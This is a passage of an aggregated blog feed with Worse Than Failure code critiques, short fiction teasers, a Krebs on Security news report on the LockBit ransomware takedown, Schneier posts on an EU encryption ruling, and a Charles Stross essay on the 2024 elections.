                      obj.Text = dtSysType.Rows(0).Item("MSYSTYPEVALUE1")
                Else
                     obj.Text = ""
             End If

          getDefaultPath = True
  End Function

obj is defined as Object, but is in fact a TextBox. The function is called getDefaultPath, which is not what it seems to do. What does it do?

Well, it looks up the TAXBILLINGYEAR from a table called t_controltable. It runs this query by using a variable called goDB which thanks to hungarian notation, I know is a global object. I'm not going to get too upset about reusing a single database connection as a global object, but it's definitely hinting at other issues in the code.

We check only the first row from that query, which shows a great deal of optimism about how the data is actually stored in the table. While there are many ways to ensure that tables store data in sorted order, an ORDER BY clause would go a long way to making the query clear. Also, since we only need one row, a TOP N or some equivalent would be nice.

Then we use a global calendar object to do absolutely nothing in our if statement.

That leads us to the second query, which at least Categoryid is an integer and lEffTaxYear is a long, which makes this potential SQL injection not really an issue. We run that query, and then check the number of rows- a sane check which we didn't do for the last query- and then once again, only look at the first row.

I'm going to note that MSYSTYPEVALUE1 may or may not be a "default path", but I certainly have no idea what they're talking about and what data this function is actually getting here. The name of the function and the function of the function seem disconnected.

In any case, I especially like that it doesn't return a value, but directly mutates the text box, ensuring minimal reusability of the function. It could have returned a string, instead.

Speaking of returning strings, that gets us to our final bonus. It does return a string- a string of "True", using the "delightful" functionName = returnValue syntax. Presumably, this is meant to represent a success condition, but it only ever returns true, concealing any failures (or, more likely, just bubbling up an exception). The fact that the return value is a string hints at another code smell- loads of stringly typed data.

The "good" news is that what it took layers of subcontractors to destroy, Maurice's team is going to fix by June. Well, that's the schedule anyway.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

365 TomorrowsThe Grand Mothering

Author: Amy Lyons I meant to birth children but they slipped my mind. I should have ransom-noted a reminder with the black and white word-magnets on my aughts refrigerator, though those sudden stories trended toward pronoun erasure and my sketchy memory, even as a twenty-something, would have slotted a roommate as the directive’s addressee. My […]

The post The Grand Mothering appeared first on 365tomorrows.

,

365 TomorrowsSomeWare

Author: Majoki “You occupy space. Therefore you exist.” “Does that Descartes bastardization work in graveyards?” “The dead occupy space.” “Well in a diminishing returns kind of way. You might want to factor biological depreciation into your axiom.” Stenslen eyed Bihrduur icily. “You don’t want this to work.” “No. Not really,” Bihrduur replied. “Call it my […]

The post SomeWare appeared first on 365tomorrows.

Worse Than FailureCodeSOD: Route to Success

Imagine you're building a PHP web application, and you need to display different forms on different pages. Now, for most of us, we'd likely be using some framework to solve this problem, but even if we weren't, the obvious solution of "use a different PHP file for each screen" is a fairly obvious solution.

Dare I say, too obvious a solution?

What if we could have one page handle requests for many different URLs? Think of the convenience of having ONE file to run your entire application? Think of the ifs.

   	if( substr( $_SERVER['REQUEST_URI'], strrpos($_SERVER['REQUEST_URI'], "=" ) + 1 ) == "request" ) 
   	{
   		echo "<form name=\"request\" action=\"\" method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return validrequest();\">\n";
   	}
   	else if( substr( $_SERVER['REQUEST_URI'], strrpos($_SERVER['REQUEST_URI'], "=" ) + 1 ) == "response" ) 
   	{
   		echo "<form action=\"\" method=\"post\" onsubmit=\"return validresponse()\">\n";
   	}
   	else if( substr( substr( $_SERVER['REQUEST_URI'], stripos($_SERVER['REQUEST_URI'], "=" ) + 1 ), 0, 7 ) == "respond" ) 
   	{
   		echo "<form name=\"respond\" action=\"\" method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return validresponse();\">\n";
   	}
   	else if( substr( substr( $_SERVER['REQUEST_URI'], stripos($_SERVER['REQUEST_URI'], "=" ) + 1 ), 0, 6 ) == "upload" )
   	{
   		echo "<form name=\"upload\" method=\"post\" action=\"\" enctype=\"multipart/form-data\">\n";
   	}
   	else if( substr( substr( $_SERVER['REQUEST_URI'], stripos($_SERVER['REQUEST_URI'], "=" ) + 1 ), 0, 8 ) == "showitem" ) 
   	{
   		echo "<form name=\"showitem\" action=\"\" method=\"post\" enctype=\"multipart/form-data\">\n";
   	}
   	else if( substr( substr( $_SERVER['REQUEST_URI'], stripos($_SERVER['REQUEST_URI'], "=" ) + 1 ), 0, 7 ) == "adduser" ) 
   	{
   		echo "<form name=\"adduser\" action=\"\" method=\"post\" onsubmit=\"return validadduser();\">\n";
   	}
   	else if( substr( substr( $_SERVER['REQUEST_URI'], stripos($_SERVER['REQUEST_URI'], "=" ) + 1 ), 0, 8 ) == "edituser" ) 
   	{
   		echo "<form name=\"adduser\" action=\"\" method=\"post\" onsubmit=\"return validedituser();\">\n";
   	}
   	else
   	{
   		echo "<form action=\"\" method=\"post\">\n";
   	}

Someone reinvented routing, badly. We split the requested URL on an =, so that we can compare the tail of the string against one of our defined routes. Oops, no, we don't split, we take a substring, which means we couldn't have a route upload_image or showitems, since they'd collide with upload and showitem.

And yes, you can safely assume that there are a bunch more ifs that control which specific form fields get output.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

,

Krebs on SecurityFeds Seize LockBit Ransomware Websites, Offer Decryption Tools, Troll Affiliates

U.S. and U.K. authorities have seized the darknet websites run by LockBit, a prolific and destructive ransomware group that has claimed more than 2,000 victims worldwide and extorted over $120 million in payments. Instead of listing data stolen from ransomware victims who didn’t pay, LockBit’s victim shaming website now offers free recovery tools, as well as news about arrests and criminal charges involving LockBit affiliates.

Investigators used the existing design on LockBit’s victim shaming website to feature press releases and free decryption tools.

Dubbed “Operation Cronos,” the law enforcement action involved the seizure of nearly three-dozen servers; the arrest of two alleged LockBit members; the unsealing of two indictments; the release of a free LockBit decryption tool; and the freezing of more than 200 cryptocurrency accounts thought to be tied to the gang’s activities.

LockBit members have executed attacks against thousands of victims in the United States and around the world, according to the U.S. Department of Justice (DOJ). First surfacing in September 2019, the gang is estimated to have made hundreds of millions of U.S. dollars in ransom demands, and extorted over $120 million in ransom payments.

LockBit operated as a ransomware-as-a-service group, wherein the ransomware gang takes care of everything from the bulletproof hosting and domains to the development and maintenance of the malware. Meanwhile, affiliates are solely responsible for finding new victims, and can reap 60 to 80 percent of any ransom amount ultimately paid to the group.

A statement on Operation Cronos from the European police agency Europol said the months-long infiltration resulted in the compromise of LockBit’s primary platform and other critical infrastructure, including the takedown of 34 servers in the Netherlands, Germany, Finland, France, Switzerland, Australia, the United States and the United Kingdom. Europol said two suspected LockBit actors were arrested in Poland and Ukraine, but no further information has been released about those detained.

The DOJ today unsealed indictments against two Russian men alleged to be active members of LockBit. The government says Russian national Artur Sungatov used LockBit ransomware against victims in manufacturing, logistics, insurance and other companies throughout the United States.

Ivan Gennadievich Kondratyev, a.k.a. “Bassterlord,” allegedly deployed LockBit against targets in the United States, Singapore, Taiwan, and Lebanon. Kondratyev is also charged (PDF) with three criminal counts arising from his alleged use of the Sodinokibi (aka “REvil“) ransomware variant to encrypt data, exfiltrate victim information, and extort a ransom payment from a corporate victim based in Alameda County, California.

With the indictments of Sungatov and Kondratyev, a total of five LockBit affiliates now have been officially charged. In May 2023, U.S. authorities unsealed indictments against two alleged LockBit affiliates, Mikhail “Wazawaka” Matveev and Mikhail Vasiliev.

Vasiliev, 35, of Bradford, Ontario, Canada, is in custody in Canada awaiting extradition to the United States (the complaint against Vasiliev is at this PDF). Matveev remains at large, presumably still in Russia. In January 2022, KrebsOnSecurity published Who is the Network Access Broker ‘Wazawaka,’ which followed clues from Wazawaka’s many pseudonyms and contact details on the Russian-language cybercrime forums back to a 31-year-old Mikhail Matveev from Abaza, RU.

An FBI wanted poster for Matveev.

In June 2023, Russian national Ruslan Magomedovich Astamirov was charged in New Jersey for his participation in the LockBit conspiracy, including the deployment of LockBit against victims in Florida, Japan, France, and Kenya. Astamirov is currently in custody in the United States awaiting trial.

LockBit was known to have recruited affiliates that worked with multiple ransomware groups simultaneously, and it’s unclear what impact this takedown may have on competing ransomware affiliate operations. The security firm ProDaft said on Twitter/X that the infiltration of LockBit by investigators provided “in-depth visibility into each affiliate’s structures, including ties with other notorious groups such as FIN7, Wizard Spider, and EvilCorp.”

In a lengthy thread about the LockBit takedown on the Russian-language cybercrime forum XSS, one of the gang’s leaders said the FBI and the U.K.’s National Crime Agency (NCA) had infiltrated its servers using a known vulnerability in PHP, a scripting language that is widely used in Web development.

Several denizens of XSS wondered aloud why the PHP flaw was not flagged by LockBit’s vaunted “Bug Bounty” program, which promised a financial reward to affiliates who could find and quietly report any security vulnerabilities threatening to undermine LockBit’s online infrastructure.

This prompted several XSS members to start posting memes taunting the group about the security failure.

“Does it mean that the FBI provided a pentesting service to the affiliate program?,” one denizen quipped. “Or did they decide to take part in the bug bounty program? :):)”

Federal investigators also appear to be trolling LockBit members with their seizure notices. LockBit’s data leak site previously featured a countdown timer for each victim organization listed, indicating the time remaining for the victim to pay a ransom demand before their stolen files would be published online. Now, the top entry on the shaming site is a countdown timer until the public doxing of “LockBitSupp,” the unofficial spokesperson or figurehead for the LockBit gang.

“Who is LockbitSupp?” the teaser reads. “The $10m question.”

In January 2024, LockBitSupp told XSS forum members he was disappointed the FBI hadn’t offered a reward for his doxing and/or arrest, and that in response he was placing a bounty on his own head — offering $10 million to anyone who could discover his real name.

“My god, who needs me?,” LockBitSupp wrote on Jan. 22, 2024. “There is not even a reward out for me on the FBI website. By the way, I want to use this chance to increase the reward amount for a person who can tell me my full name from USD 1 million to USD 10 million. The person who will find out my name, tell it to me and explain how they were able to find it out will get USD 10 million. Please take note that when looking for criminals, the FBI uses unclear wording offering a reward of UP TO USD 10 million; this means that the FBI can pay you USD 100, because technically, it’s an amount UP TO 10 million. On the other hand, I am willing to pay USD 10 million, no more and no less.”

Mark Stockley, cybersecurity evangelist at the security firm Malwarebytes, said the NCA is obviously trolling the LockBit group and LockBitSupp.

“I don’t think this is an accident—this is how ransomware groups talk to each other,” Stockley said. “This is law enforcement taking the time to enjoy its moment, and humiliate LockBit in its own vernacular, presumably so it loses face.”

In a press conference today, the FBI said Operation Cronos included investigative assistance from the Gendarmerie-C3N in France; the State Criminal Police Office L-K-A and Federal Criminal Police Office in Germany; Fedpol and Zurich Cantonal Police in Switzerland; the National Police Agency in Japan; the Australian Federal Police; the Swedish Police Authority; the National Bureau of Investigation in Finland; the Royal Canadian Mounted Police; and the National Police in the Netherlands.

The Justice Department said victims targeted by LockBit should contact the FBI at https://lockbitvictims.ic3.gov/ to determine whether affected systems can be successfully decrypted. In addition, the Japanese Police, supported by Europol, have released a recovery tool designed to recover files encrypted by the LockBit 3.0 Black Ransomware.

Worse Than FailureCodeSOD: Merge the Files

XML is, arguably, an overspecified language. Every aspect of XML has a standard to interact with it or transform it or manipulate it, and that standard is also defined in XML. Each specification related to XML fits together into a soup that does all the things and solves every problem you could possibly have.

Though Owe had a problem that didn't quite map to the XML specification(s). Specifically, he needed to parse absolutely broken XML files.

bool Sorter::Work()
{
	if(this->__disposed)
		throw gcnew ObjectDisposedException("Object has been disposed");
	
	if(this->_splitFiles)
	{
		List<Document^>^ docs = gcnew List<Document^>();
		for each(FileInfo ^file in this->_sourceDir->GetFiles("*.xml"))
		{
			XElement ^xml = XElement::Load(file->FullName);
			xml->Save(file->FullName);
			long count = 0;
			for each(XElement^ rec in xml->Elements("REC"))
			{
					if(rec->Attribute("NAME")->Value == this->_mainLevel)
						count++;
			}
			if(count < 2)
				continue;
			StreamReader ^reader = gcnew StreamReader(file->OpenRead());
			StringBuilder ^sb = gcnew StringBuilder("<FILE NAME=\"blah\">");
			bool first = true;
			bool added = false;
			Regex ^isRecOrFld = gcnew Regex("^\\s+\\<[REC|FLD].*$");
			Regex ^isEndOfRecOrFld = gcnew Regex("^\\s+\\<\\/[REC|FLD].*$");
			Regex ^isMainLevelRec = gcnew Regex("^\\s+\\<REC NAME=\\\""+this->_mainLevel+"\\\".*$");
			while(!reader->EndOfStream)
			{
				String ^line = reader->ReadLine();
				if(!isRecOrFld->IsMatch(line) && !isEndOfRecOrFld->IsMatch(line))
					continue;
				if(isMainLevelRec->IsMatch(line) && !String::IsNullOrEmpty(sb->ToString()) && !first)
				{
					sb->AppendLine("</FILE>");
					XElement^ xml = XElement::Parse(sb->ToString());
					String ^key = String::Empty;
					for each(XElement ^rec in xml->Elements("REC"))
					{
						key = this->findKey(rec);
						if(!String::IsNullOrEmpty(key))
							break;
					}
					docs->Add(gcnew Document(key, gcnew XElement("container", xml)));
					sb = gcnew StringBuilder("<FILE NAME=\"blah\">");
					first = true;
					added = true;
				}
				sb->AppendLine(line);
				if(first && !added)
												first = false;
				if(added)
												added = false;
			}
			delete reader;
			file->Delete();
		}
		int i = 1;
		for each(Document ^doc in docs)
		{
										XElement ^splitted = doc->GetData()->Element("FILE");
										splitted->Save(Path::Combine(this->_sourceDir->FullName, this->_docPrefix + "_" + i++ + ".xml"));
										delete splitted;
		}
		delete docs;
	}
	List<Document^>^ docs = gcnew List<Document^>();
	for each(FileInfo ^file in this->_sourceDir->GetFiles(String::Format("{0}*.xml", this->_docPrefix)))
	{
		XElement ^xml = XElement::Load(file->FullName);
		String ^key = findKey(xml->Element("REC")); // will always be first element in document order
		Document ^doc = gcnew Document(key, gcnew XElement("data", xml));
		docs->Add(doc);
		file->Delete();
	}
	List<Document^>^ sorted = MergeSorter::MergeSort(docs);
	XElement ^sortedMergedXml = gcnew XElement("FILE", gcnew XAttribute("NAME", "MergedStuff"));
	for each(Document ^doc in sorted)
	{
		sortedMergedXml->Add(doc->GetData()->Element("FILE")->Elements("REC"));
	}
	sortedMergedXml->Save(Path::Combine(this->_sourceDir->FullName, String::Format("{0}_mergedAndSorted.xml", this->_docPrefix)));
	// returning a sane value
	return true;
}

This is in the .NET dialect of C++, so the odd ^ sigil is a handle to a garbage collected object.

There's a lot going on here. The purpose of this function is to possibly split some pre-merged XML files into separate XML files, and then take a set of XML files and merge them back together (properly sorted).

So we start by confirming that this object hasn't been disposed, and throwing an exception if it has. Then we try and split.

To do this, we search the directory for "*.xml", and then we… load the file and then save the file? The belief about this code is that it corrects the whitespace, because later on we require some whitespace- but the .NET XML writer doesn't add whitespace, only preserve it, so I suspect this line isn't necessary- or at least shouldn't be. I can envision a world where this somehow makes the code work for reasons that are best not thought about.

Owe writes, to the preceding developers: "Thanks guys, I really appreciate this!"

Now, since we're iterating across an entire directory of XML files, some of the files have been pre-merged (and need to be unmerged), and others haven't been merged at all. How do we tell them apart? We find every element named "REC", and check if it's "NAME" attribute is equivalent to our _mainLevel value. If there are at least two such element, we know that this file has been premerged and thus needs to be unmerged.

Owe writes: "Thanks guys, I really appreciate this!"

And then we get into the dreaded parse XML with regex phase. This is done because the XML files aren't actually valid XML. So it's a mix of string operations and regex matches to try and interpret the data. And remember that whitespace that we thought we required back when we wrote the documents out? Well here's why: our regexes are matching on whitespace.

Owe writes: "Thanks guys, I really appreciate this!"

Once we've constructed all the documents in memory, we can then dump them out to a new set of files. And then, once that's done, we can reopen those files, because now the merging happens. Here we find all the "REC" elements and build new XML documents based off of them. Then a MergeSorter::MergeSort function actually does the merging- and honestly, I dread to think about what that looks like.

The merge sorter sorts the documents, but we actually want to output one document with the elements in that sorted order, so we create one last XML document, iterate across all our sorted document fragments, and then inject the "REC" elements into the output.

Owe writes: "Thanks guys, I really appreciate this!"

While the code and the entire process here is terrible, the core WTF is the "we need to store our XML with the elements sorted in a specific order". That's not what XML is for. But obviously, they don't know what XML is for, since they're doing things in their documents that can't successfully be parsed by an XML parser. Or, perhaps more accurately, they couldn't figure out how to parse as XML, hence the regexes and string munging.

Were the documents sensible, this whole thing could probably have been solved with some fairly straightforward (by XML standards) XQuery/XSLT operations. Instead, we have this. Thanks guys, I really appreciate this.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

365 TomorrowsEvocation

Author: Steve Smith, Staff Writer I have no memory of what came before. It’s as though I didn’t exist prior to this moment and have just come into existence and apparated into this crowd, in this hall, surrounded by the ordered chaos of these several hundred people. We’re collected here for a singular purpose, all […]

The post Evocation appeared first on 365tomorrows.

,

Cryptogram Friday Squid Blogging: Illex Squid and Climate Change

There are correlations between the populations of the Illex Argentines squid and water temperatures.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Cryptogram EU Court of Human Rights Rejects Encryption Backdoors

The European Court of Human Rights has ruled that breaking end-to-end encryption by adding backdoors violates human rights:

Seemingly most critically, the [Russian] government told the ECHR that any intrusion on private lives resulting from decrypting messages was “necessary” to combat terrorism in a democratic society. To back up this claim, the government pointed to a 2017 terrorist attack that was “coordinated from abroad through secret chats via Telegram.” The government claimed that a second terrorist attack that year was prevented after the government discovered it was being coordinated through Telegram chats.

However, privacy advocates backed up Telegram’s claims that the messaging services couldn’t technically build a backdoor for governments without impacting all its users. They also argued that the threat of mass surveillance could be enough to infringe on human rights. The European Information Society Institute (EISI) and Privacy International told the ECHR that even if governments never used required disclosures to mass surveil citizens, it could have a chilling effect on users’ speech or prompt service providers to issue radical software updates weakening encryption for all users.

In the end, the ECHR concluded that the Telegram user’s rights had been violated, partly due to privacy advocates and international reports that corroborated Telegram’s position that complying with the FSB’s disclosure order would force changes impacting all its users.

The “confidentiality of communications is an essential element of the right to respect for private life and correspondence,” the ECHR’s ruling said. Thus, requiring messages to be decrypted by law enforcement “cannot be regarded as necessary in a democratic society.”

Charles StrossThe coming storm

(I should have posted this a couple of weeks ago ...)

2024 looks set to be a somewhat disruptive year.

Never mind the Summer Olympics in Paris; the big news is politics, where close to half the world's population get to vote in elections with a strong prospect of electing outright fascists.

Taiwan was first on 13th January, and elected Democratic People's Party incumbent Vice-President Vice President Lai Ching-te as President. I don't have enough understanding of Taiwanese politics to comment further other than to note that this outcome evinced displeased noises from Beijing (and my interpretation is that pleased noises from Beijing would have been a Very Bad Sign).

Finland gets to elect a new President on January 28th; incumbent Sauli Niinistö will be leaving office, and I'm unable to find details of the current candidates. (As the presidency of Finland is a ceremonial role rather than an executive one it's probably less significant than the current Prime Minister—elected last year—but might be a signal as to whether the Finnish electorate are happy with the right-wing shift at the last election. It's also significant in that Finland is a front-line state with respect to Russia.)

Much larger nations who are voting in parliamentary elections in February include Pakistan and Indonesia: with combined population of over 500 million these are the two most numerous muslim states today. Smaller but geopolitically significant, Belarus is electing a new parliament (probably in accordance with the preferences fo the dictator Lukashenko, a client of Moscow). Of interest mostly to Americans, El Salvador is electing both a president and parliament.

March sees elections in Iran, Ireland, and Portugal; also a rubber stamp for Vladimir Putin's presidency in Russia: and Slovakia votes on a new head of state. (Irish voters also get to decide on two constitutional amendments: one that revises the definition of family to explicitly include durable relationships outside marriage, and another to remove references in the constitution to a woman's "life within the home" and "duties in the home". Both are expected to pass.)

Some Time from early May onwards there will almost certainly be a general election and a change of government in the UK. A general election must take place no later than the first Thursday of 2025, but it is expected that Prime Minister Rishi Sunak will announce the date of a snap election after the budget in March (which is expected to cut taxes on likely voting demographics). A British general election takes no more than 5-6 weeks to organize. It is possible according to some pundits that he'll schedule the vote for June, hoping for a good-weather boost to government polling, but short of a miracle the Conservatives are going to go down hard. (Current polling suggests the election will return a Labour majority government, and the Conservatives will lose more than half their seats in their worst defeat since 1997. I can't wait.)

April: South Korea elects a new parliament. It's worth noting that this has global implications—North Korea is selling munitions to Russia for the Ukraine invasion, while South Korea has closed a major arms deal with Poland (to replace Poland's existing fleet of main battle tanks, which are being sold on to Ukraine) as part of Poland's re-armament. (Russian pundits have been making noises along the lines of "Kiev today, Warsaw and Helsinki tomorrow".)

May: Panama, North Macedonia, Lithuania, and the Dominican Republic all elect a parliament, a president, or both.

June: Iceland, Mexico, and Mauritania all get new Presidents; Mexico, Belgium, and Mongolia all get new parliaments.

July: Rwanda elects a new president and chamber of deputies.

October: Mozambique and Uruguay elect new presidents and parliaments.

November: Palau and Somaliland elect new presidents. Also some other place is voting on the 5th, a date traditionally associated with gunpowder, treason, and plot (or, in more familiar terms, an attempt to overthrow the head of state and replace him with a puppet in thrall to minority religious zealots).

A number of other nations have elections due some time in 2024, but like the UK they follow no set date pattern. The largest is India, where far right nationalist Hindutva leader Narendra Modi looks likely to consolidate power, but the list also includes Algeria, Austria, Botswana, Chad, Croatia, Gabon, Georgia, Ghana, Kiribati, Lithuania, Mauritius, Moldova, Namibia, Romania, San Marino, the Solomon Islands, South Africa, Sotuh Sudan, Sri Lanka, Togo, Uzbekistan, and Venezuela.

Ukraine would elect a new president this year, but it's not clear whether Volodymyr Zelenskyy will face a wartime election: he previously indicated that he would retire from politics when the war ended.

And fuck knows what's going to happen politically in Israel this year.

Here's the thing: this looks like a pivotal year for democracy around the world. Half the planet is voting in elections with various fascists and fundamentalists—there's often no discernable difference: clerico-fascism is resurgent in multiple religions—seeking control.

Some of the potential outcomes are disastrous. A return to the White House by the tangerine shitgibbon would inevitably cut off all US assistance to Ukraine, and probably lead to a US withdrawl from NATO ... just as Russia is attempting to invade and conquer a nation in the process of trying to join both the EU and NATO. This would encourage Russia to follow through with attacks on the Baltic States (Latvia, Lithuania, and Estonia), Finland, and finally Poland, all of which were part of the Russian empire either prior to 1917 or under Stalin and which Putinists see as their property. Having militarized the Russian economy, it's not clear what else Putin could do after occupying Ukraine: global demand for fossil fuels (his main export) is going to fall off a cliff over the next decade and the Russian economy is broken. Hitler's expansion after 1938 was driven by the essential failure of the German economy, leading him to embark on an asset-stripping spree: stealing Eastern Europe probably looks attractive from where the Russian dictator is sitting.

There is, as usual, a risk of conflict between India and Pakistan, potentially aggravated by election outcomes in both nations (both of whom are nuclear-armed). India under the BJP is increasingly authoritarian and alligned with Russia (they're a major oil customer). Iran ... oddly, Iran is least likely to be problematic as a result of election outcomes in 2024: meet the new mullah, just like the old mullah. The regime savagely suppressed the feminist uprising of 2022-23 but is still dealing with dissatisfaction at home, and seems unlikely to want trouble abroad (aside from the usual support for turbulent proxies such as the Houthis and Hezbollah).

It's also worth noting that Premier Xi has made no bones about seeking to regain control of Taiwan, which China views as a breakaway province. The failure of Russia to subdue Ukraine in 2022 was a major reality check, but if Ukraine collapses and NATO disintegrates, leading to Russian expansion in the west and US isolationism, then there may be nothing holding back China from invading a Taiwan stripped of US support.

At which point, by the end of 2024 we could be in Third World War territory, with catastrophically accelerating climate change on top.

On the other hand: none of this is inevitable.

Leaving aside the global fascist insurgency and the oil and climate wars, and it's worth noting that we are seeing exponential growth in the rate of photovoltaic capacity worldwide: each year this decade so far we've collectively installed 50% more PV panels than existed in the previous year. 50% annual compound growth in a new energy resource will rewrite the equations that underly economics in a very short period of time. The renewable energy sector now employs more people than fossil fuels, and the growth is still accelerating.

Most of us have a very poor intuition for exponential growth curves, so here's a metaphor: think back to the first months of 2020 and the onset of the COVID19 pandemic. Now replace the virus with an energy economy transition, and map each week of February-to-April of 2020 onto one year of 2020-2035. We heard about this worrying new disease a few weeks ago, in China: it's now March 1st, and apparently hospitals in Italy are overflowing and health officials are telling us to wash our hands. Governments are holding crisis meetings, and the word "lockdown" is being bandied about on news broadcasts, but nobody knows quite where it's going and the virus hasn't gotten here yet. And this is 2024.

In this metaphor, next week is 2025. Your government is about to go into full-on panic mode. Curfews, empty streets, ambulance sirens a constant background noise. New York, London, and Paris are plague zones.

Now flip the metaphor: instead of curfews and empty streets we have energy crises and really bad storms and floods and food prices destabilizing. But we also have a glimmer of hope: renewables everywhere, coal-fired power stations shutting down for good, e-bikes everywhere (and traffic planning measures to accommodate them), electric cars showing up in significant numbers in those places that are dependent on automobiles. The oil-addicted export economies (think Russia, Saudi Arabia, Venezuela) are hurting.

The metaphor is inexact: but by 2026-27, if we get through 2024 without a nuclear war, it's going to be glaringly obvious that we've turned away from fossil fuel business as usual, and that the political upheavals of 2008-2024 were driven by dark money flows and disinformation campaigns funded by oligarchs who valued retention of their own privileged status above our survival as a species.

MODERATION NOTE

This is not a discussion thread for the upcoming US election in November. Comments relating to Trump/Biden and US politics will be summarily deleted. You can discuss non-American politics instead for once.

365 TomorrowsThe Tavern in the Town

Author: Julian Miles, Staff Writer There’s a tavern by the graveyard. Not one of those new servaraunts, but a real vintage place with tiny lattice windows and a big wooden door that glints in the light from the glows as it swings back and forth. Old Stanislaw told me it used to not do that, […]

The post The Tavern in the Town appeared first on 365tomorrows.

Worse Than FailureRepresentative Line: From a String Builder

Inheritance is one of those object-oriented concepts that creates a lot of conflicts. You'll hear people debating what constitutes an "is-a" versus a "has-a" relationship, you'll hear "favor composition over inheritance", you'll see languages adopt mix-in patterns which use inheritance to do composition. Used well, the feature can make your code cleaner to read and easier to maintain. Used poorly, it's a way to get your polymorphism with a side of spaghetti code.

Greg was working on a medical data application's front end. This representative line shows how they use inheritance:

  public class Patient extends JavascriptStringBuilder

Greg writes: "Unfortunately, the designers were quite unacquainted with newfangled ideas like separating model objects from the UI layer, so they gave us this gem."

This, of course, was a common pattern in the application's front end. Many data objects inherited from string builder. Not all of them, which only helped to add to the confusion.

As for why? Well, it gave these objects a "string" function, which they could override to generate output. You want to print a patient to the screen? What could be easier than calling patient.string()?

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.